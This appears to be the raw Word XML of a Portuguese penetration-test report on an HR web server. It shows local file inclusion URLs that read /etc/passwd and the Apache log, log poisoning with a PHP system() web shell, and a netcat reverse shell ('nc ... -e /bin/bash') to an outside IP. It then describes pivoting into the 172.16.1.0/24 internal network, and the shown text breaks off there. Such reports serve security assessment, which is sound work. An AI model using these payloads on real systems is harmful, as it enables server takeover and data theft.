          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3551AA26" w14:textId="7C1E0693" w:rsidR="00E42214" w:rsidRPr="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Fi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clusion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FB0E2C5" w14:textId="46FD4079" w:rsidR="00C9101E" w:rsidRPr="005F56A5" w:rsidRDefault="005E6338" w:rsidP="00940DE4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alha de LFI permite ler arquivos de configuração de serviços do servidor, e extrair informações sobre configuração de serviços e do servidor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="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B876B2" w:rsidRPr="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r w:rsidR="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005F56A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lendo arquivo /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F56A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F56A5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5F56A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F56A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do servidor</w:t>
      </w:r>
      <w:r w:rsidR="00B876B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asswd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720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C9101E" w14:paraId="52C41242" w14:textId="77777777" w:rsidTr="00C9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14:paraId="47E5B7AC" w14:textId="77777777" w:rsidR="00C9101E" w:rsidRDefault="00C9101E" w:rsidP="009D678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101E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>http://rh.grandbusiness.com.br/index.php?page=/etc/passwd%00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F37A62A" w14:textId="044AE2A6" w:rsidR="00E42214" w:rsidRDefault="00E42214" w:rsidP="00940DE4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DAA5C04" w14:textId="66ED842D" w:rsidR="00C9101E" w:rsidRPr="005F56A5" w:rsidRDefault="00E42214" w:rsidP="00940DE4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310ABE6" wp14:editId="71F9BA54">
            <wp:extent cx="5400040" cy="1858645"/>
            <wp:effectExtent l="0" t="0" r="1016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6-06-17 at 11.32.2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6A5" w:rsidRPr="005F56A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lendo arquivo de configuração da rede do servidor</w:t>
      </w:r>
      <w:r w:rsidR="005E6338">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005E6338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5E6338">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/network/interface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720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C9101E" w14:paraId="4168A778" w14:textId="77777777" w:rsidTr="00C9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14:paraId="3AED6C83" w14:textId="77777777" w:rsidR="00C9101E" w:rsidRDefault="00C9101E" w:rsidP="00401BE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101E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>http://rh.grandbusiness.com.br/index.php?page=/etc/network/interfaces%00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21CFF814" w14:textId="40F4AD88" w:rsidR="005E6338" w:rsidRDefault="00E42214" w:rsidP="00940DE4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33BE70F" wp14:editId="26278260">
            <wp:extent cx="5400040" cy="1336675"/>
            <wp:effectExtent l="0" t="0" r="1016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6-06-17 at 11.32.5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F9D3" w14:textId="05B20590" w:rsidR="00C9101E" w:rsidRPr="005F56A5" w:rsidRDefault="005F56A5" w:rsidP="00940DE4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ndo arquivo de log do apache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5F56A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/var/log/apache2/access.log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720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C9101E" w:rsidRPr="00C9101E" w14:paraId="53C771FB" w14:textId="77777777" w:rsidTr="00C9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14:paraId="10EF9F85" w14:textId="77777777" w:rsidR="00C9101E" w:rsidRPr="00C9101E" w:rsidRDefault="00C9101E" w:rsidP="00F66D40">
            <w:pPr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01E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>http://rh.grandbusiness.com.br/index.php?page=/var/log/apache2/access.log%00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54C1663B" w14:textId="1859BBCF" w:rsidR="00E42214" w:rsidRDefault="00E42214" w:rsidP="005F56A5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9F39891" wp14:editId="2A78C856">
            <wp:extent cx="5400040" cy="3321685"/>
            <wp:effectExtent l="0" t="0" r="1016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6-06-17 at 11.33.3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6A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="005F56A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Explorando LFI através de Infecção do log do apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A187BFE" w14:textId="2208A1AF" w:rsidR="005F56A5" w:rsidRPr="005F56A5" w:rsidRDefault="005F56A5" w:rsidP="005F56A5">
      <w:pPr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podemos notar a aplicação é em PHP e permite ler o log do apache, podemos então gerar um PAYLOAD malicioso em </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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gerar uma requisição falsa para armazenar esse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pay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icioso nesse log do apache pois na próxima execução de leitura do log o código PHP será interpretado e conseguiremos executar nosso código malicioso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  <w:t>POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32159B7E" w14:textId="004E98CB" w:rsidR="00E02FC1" w:rsidRDefault="005F56A5" w:rsidP="00940DE4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digo malicioso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8720"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F56A5" w:rsidRPr="005F56A5" w14:paraId="1B088B38" w14:textId="77777777" w:rsidTr="005F5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14:paraId="2055EA41" w14:textId="77777777" w:rsidR="005F56A5" w:rsidRPr="005F56A5" w:rsidRDefault="005F56A5" w:rsidP="005F56A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A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>&lt;?</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005F56A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005F56A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> system($_GET[‘</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005F56A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>xpl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005F56A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>’]);?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31D1A163" w14:textId="71ACBCAE" w:rsidR="005F56A5" w:rsidRDefault="005F56A5" w:rsidP="00940DE4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Este código permite executar comando do sistema operacional (system) via método GET através do parâmetro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xp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B090B8" w14:textId="77777777" w:rsidR="005F56A5" w:rsidRDefault="005F56A5" w:rsidP="00940DE4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0ACF5740" w14:textId="77777777" w:rsidR="005F56A5" w:rsidRDefault="005F56A5" w:rsidP="00940DE4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F52E56D" w14:textId="77777777" w:rsidR="005F56A5" w:rsidRDefault="005F56A5" w:rsidP="00940DE4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7FBB9138" w14:textId="45389736" w:rsidR="005F56A5" w:rsidRDefault="005F56A5" w:rsidP="00940DE4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azendo uma requisição HTTP para infectar o LOG do Apache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270DBEAC" w14:textId="55588DF9" w:rsidR="005F56A5" w:rsidRDefault="00E42214" w:rsidP="00940DE4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AAFFEBF" wp14:editId="3794A741">
            <wp:extent cx="5400040" cy="1941195"/>
            <wp:effectExtent l="0" t="0" r="1016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6-06-17 at 11.37.1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4B61" w14:textId="1415998D" w:rsidR="00C904BA" w:rsidRPr="00C904BA" w:rsidRDefault="00E02FC1" w:rsidP="00C904BA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F56A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F56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56A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A4E128A" w14:textId="4B56A586" w:rsidR="005F56A5" w:rsidRPr="00C9101E" w:rsidRDefault="00C904BA" w:rsidP="00C904BA">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21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xecução de comandos permite conseguir executar comandos do sistema operacional, neste caso em especifico conseguimos executar comandos do sistema operacional através da aplicação usando nosso código malicioso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720"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F56A5" w:rsidRPr="00C9101E" w14:paraId="4B8CC9A7" w14:textId="77777777" w:rsidTr="005F5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14:paraId="289A892A" w14:textId="39A94268" w:rsidR="005F56A5" w:rsidRPr="00C9101E" w:rsidRDefault="005F56A5" w:rsidP="00934D90">
            <w:pPr>
              <w:ind w:left="0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C9101E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>http://rh.grandbusiness.com.br/index.ph</w:t>
            </w:r>
            <w:r w:rsidRPr="00C9101E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C9101E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>?xpl=ls%20-la&amp;page=/../../var/log/apache2/access.log%00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06E889C1" w14:textId="77777777" w:rsidR="00C904BA" w:rsidRDefault="00C904BA" w:rsidP="00940DE4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A URL acima esta executando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C904BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C904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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C904BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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qual retorna os arquivos existentes no PATH (/var/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/) da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA25E99" w14:textId="79833048" w:rsidR="00E02FC1" w:rsidRDefault="00E02FC1" w:rsidP="00C904BA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4BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ganhando acesso ao servidor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E027A1" w14:textId="09190CF0" w:rsidR="00C904BA" w:rsidRPr="00C904BA" w:rsidRDefault="00C904BA" w:rsidP="00C904BA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vez que conseguimos executar comandos no servidor buscamos ganhar acesso via terminal afim de ter uma liberdade maior para controlar o servidor, para isso fizemos uso de uma CONEXAO REVERSA no qual abrimos uma porta na nossa maquina e mandamos o servidor conectar na nossa porta aberta e enviar o /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b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erminal) para que possamos tomar controle do terminal.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8720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C904BA" w:rsidRPr="00C904BA" w14:paraId="0B5DC657" w14:textId="77777777" w:rsidTr="00C90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14:paraId="4E576F83" w14:textId="77777777" w:rsidR="00C904BA" w:rsidRPr="00C904BA" w:rsidRDefault="00C904BA" w:rsidP="00C904B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BA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>rh.grandbusiness.com.br/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C904BA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>index.php?xpl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C904B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C904BA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C904BA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> 186.236.110.228 443 -e /bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C904BA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>bash&amp;page</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C904BA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>=/../../var/log/apache2/access.log%00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D23DEE7" w14:textId="02768C32" w:rsidR="00640235" w:rsidRDefault="00C904BA" w:rsidP="00940DE4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Utilizamos NETCAT para abrir a conexão e enviar o /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b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nossa maquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042AF839" w14:textId="77777777" w:rsidR="00640235" w:rsidRDefault="00640235" w:rsidP="00940DE4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D6D0F9D" w14:textId="575F7334" w:rsidR="00E42214" w:rsidRDefault="00E42214" w:rsidP="00940DE4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DFDFDF0" wp14:editId="607A4319">
            <wp:extent cx="5400040" cy="3725545"/>
            <wp:effectExtent l="0" t="0" r="1016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6-06-17 at 13.38.0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4BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Como resultados conseguimos controle sob o servidor. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ED0181" w14:textId="41B85821" w:rsidR="00C904BA" w:rsidRDefault="00C904BA" w:rsidP="00C904BA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ós – Exploração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F112A4C" w14:textId="493012E6" w:rsidR="003E62DA" w:rsidRDefault="00C904BA" w:rsidP="00C904BA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posse do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>webser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ponsável pelo RH do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dbusi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62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>buscamos um apoio em outras maquinas na mesma rede afim de elevar nosso privilégio e conseguir comprometer o resto do ambiente.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8720"/>
      </w:tblGrid>
      <w:tr w:rsidR="003E62DA" w:rsidRPr="003E62DA" w14:paraId="1A33FE1F" w14:textId="77777777" w:rsidTr="003E62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14:paraId="3E8F4AC3" w14:textId="77777777" w:rsidR="003E62DA" w:rsidRPr="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="003E62D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2DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Servidor Comprometido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E62DA" w:rsidRPr="003E62DA" w14:paraId="7EBE3DB6" w14:textId="77777777" w:rsidTr="003E6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14:paraId="57A8B896" w14:textId="77777777" w:rsidR="003E62DA" w:rsidRPr="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="003E62D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2DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>rh.grandbusiness.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E62DA" w:rsidRPr="003E62DA" w14:paraId="6C1B1365" w14:textId="77777777" w:rsidTr="003E62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14:paraId="63526C8C" w14:textId="77777777" w:rsidR="003E62DA" w:rsidRPr="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="003E62D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2DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IP local: 172.16.1.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E62DA" w:rsidRPr="00C904BA" w14:paraId="28DCB4A2" w14:textId="77777777" w:rsidTr="003E6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14:paraId="65C3F00B" w14:textId="77777777" w:rsidR="003E62DA" w:rsidRPr="00C904BA" w:rsidRDefault="003E62DA" w:rsidP="003E62D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2DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IP Externo: 209.190.1.134</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50700787" w14:textId="0ABA2DBA" w:rsidR="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="00940DE4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Através deste acesso conseguimos identificar a REDE do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dbusines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720"/>
      </w:tblGrid>
      <w:tr w:rsidR="003E62DA" w:rsidRPr="003E62DA" w14:paraId="5E04FD2F" w14:textId="77777777" w:rsidTr="003E62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14:paraId="42E4C922" w14:textId="2378EE09" w:rsidR="003E62DA" w:rsidRPr="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="003E62D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2DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>REDE INTERNA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E62DA" w14:paraId="2AC9E69A" w14:textId="77777777" w:rsidTr="003E6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14:paraId="0071DA21" w14:textId="77777777" w:rsidR="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="003E62D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2DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>172.16.1.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D6FDB" w14:textId="7FF3B146" w:rsidR="00640235" w:rsidRDefault="00640235" w:rsidP="00940DE4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7150869A" w14:textId="77777777" w:rsidR="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="00940DE4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3948B466" w14:textId="77777777" w:rsidR="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="00940DE4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033B01EE" w14:textId="7EC45BD6" w:rsidR="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="003E62DA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mprometendo outros hosts da rede interna</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356F07C0" w14:textId="09C5A7D5" w:rsidR="004816B1" w:rsidRPr="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="003E62DA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acesso a rede interna através do host comprometido conseguimos localizar outros hosts na rede </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23238F74" w14:textId="17E40243" w:rsidR="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="00940DE4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ontramos um HOST com alguns serviços vulneráveis ativo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720"/>
      </w:tblGrid>
      <w:tr w:rsidR="003E62DA" w:rsidRPr="003E62DA" w14:paraId="507BD513" w14:textId="77777777" w:rsidTr="003E62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14:paraId="3CE24B9F" w14:textId="77777777" w:rsidR="003E62DA" w:rsidRPr="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="003E62D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2DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>WORKSTATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E62DA" w:rsidRPr="003E62DA" w14:paraId="4B57221F" w14:textId="77777777" w:rsidTr="003E6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14:paraId="39AA0A3A" w14:textId="77777777" w:rsidR="003E62DA" w:rsidRPr="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="003E62D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2DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IP: 172.16.1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E62DA" w:rsidRPr="003E62DA" w14:paraId="60AA448F" w14:textId="77777777" w:rsidTr="003E6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14:paraId="68C4CAF0" w14:textId="77777777" w:rsidR="003E62DA" w:rsidRPr="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="003E62D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2DA">
              <w:rPr>
